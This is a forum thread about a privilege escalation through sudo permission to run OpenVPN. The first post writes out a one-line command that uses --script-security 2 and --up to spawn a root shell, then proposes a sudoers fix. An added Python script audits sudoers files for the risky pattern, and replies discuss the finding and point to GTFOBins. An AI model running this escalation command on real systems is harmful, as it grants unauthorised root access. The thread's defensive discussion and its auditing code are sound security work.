Pretty Niche: OpenVPN as a vector for privilege escalation – Digitalmunition





This topic contains 1 reply, has 2 voices, and was last updated by  crooq42 4 weeks, 1 day ago.

  • #323790

    anonymous
    Participant

    Not sure how applicable this will be to everyone as it’s pretty niche as a setup.

    If you’re a non-root user with sudoer (/etc/sudoers.d/<username>) permission to openvpn, as in with a line saying:

    /usr/sbin/openvpn *

    I found this on a server providing a secured VPN connection.

    You can obtain a root shell using:

    sudo openvpn --remote 1.2.3.4 --dev tun --script-security 2 --up "/bin/bash -c 'sudo -u root /bin/bash -i'"

    The script security 2 is what allows the command to run user scripts. You can replace my command with any executable script path and it will run as the root OpenVPN user.

    You can fix this vulnerability by changing the sudoers file to:

    /usr/sbin/openvpn * --script-security 0

    Any sudo commands run will have to pass that flag at the end, and this overwrites any previous script security designations.

    This is in a programmatic environment so it’s easy to implement without user issue. But this may not be ideal with users interacting through the command line. There may be a better way to fix it, but I thought I’d share anyway.

    The root user was meant to be disabled on this server. It’s meant to be completely locked down. The OpenVPN user needed the permission to start/stop/restart OpenVPN itself.
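
A defensive check for the sudoers pattern described in the post above, added here as an example that is not part of the original thread: it flags openvpn command specs that leave the argument list open without the trailing `--script-security 0` the post proposes. The parser is simplified (no line continuations, escaped commas or multi-user runas lists), and the user names and sample entries are constructed.

```python
import re

# Optional (runas) spec and tags such as NOPASSWD: that precede a command.
_PREFIX = re.compile(r"^\s*(\([^)]*\)\s*)?([A-Z_]+:\s*)*")

def classify(command):
    """Return a reason string if an openvpn command spec is risky, else None."""
    parts = command.split(None, 1)
    if not parts or parts[0].rsplit("/", 1)[-1] != "openvpn":
        return None
    if len(parts) == 1:
        return "no argument list: sudo accepts any arguments"
    args = parts[1].strip()
    if args == '""':
        return None  # explicit empty string: no arguments permitted
    if not any(ch in args for ch in "*?["):
        return None  # fixed argument list, the caller cannot add options
    if re.search(r"--script-security\s+0$", args):
        return None  # the mitigation from the post: flag pinned at the end
    return "wildcard arguments without a trailing --script-security 0"

def audit_sudoers(text):
    """Return (line number, subject, command, reason) for each risky entry."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        if "=" not in line or re.match(r"(User|Runas|Host)_Alias\b", line):
            continue
        subject, spec = line.split("=", 1)  # Cmnd_Alias lines are audited too
        for cmd in spec.split(","):
            cmd = _PREFIX.sub("", cmd, count=1).strip()
            reason = classify(cmd)
            if reason:
                findings.append((lineno, subject.strip(), cmd, reason))
    return findings

# Constructed sample, not taken from the server in the post.
SAMPLE = """\
# /etc/sudoers.d/vpn (constructed)
Defaults env_reset
vpnuser ALL=(root) NOPASSWD: /usr/sbin/openvpn *
vpnuser2 ALL=(root) NOPASSWD: /usr/sbin/openvpn * --script-security 0
vpnuser3 ALL=(root) NOPASSWD: /usr/sbin/openvpn --config /etc/openvpn/client.conf
vpnuser4 ALL=(root) /usr/sbin/openvpn, /usr/bin/systemctl restart openvpn
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print("line %d: %s -> %s (%s)" % finding)
```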

  • #323791

    crooq42

    This isn't really a vulnerability, seems more like a feature working as intended. If you have sudo access you can already open a root shell and do anything root can do. Good effort though, keep up the bug hunts!

    Edit: misunderstood it a bit, guess you could elevate to a full root shell with only sudo access to OpenVPN. Not a likely setup but still a good find.

  • #323792

    INIT_6

    Hell yeah, these are great little bugs. Feels like a weird edge case the dev didn’t think about.

    This kind of stuff reminds me of Unquoted Service Path vulnerabilities in Windows. Happens all the time, but when it happens to popular software it creates a huge splash.

  • #323793

    jalgroy

    There are a ton of programs that can give you a root shell if you have sudo access to them. Have a look at [GTFOBins](https://gtfobins.github.io/#+shell)
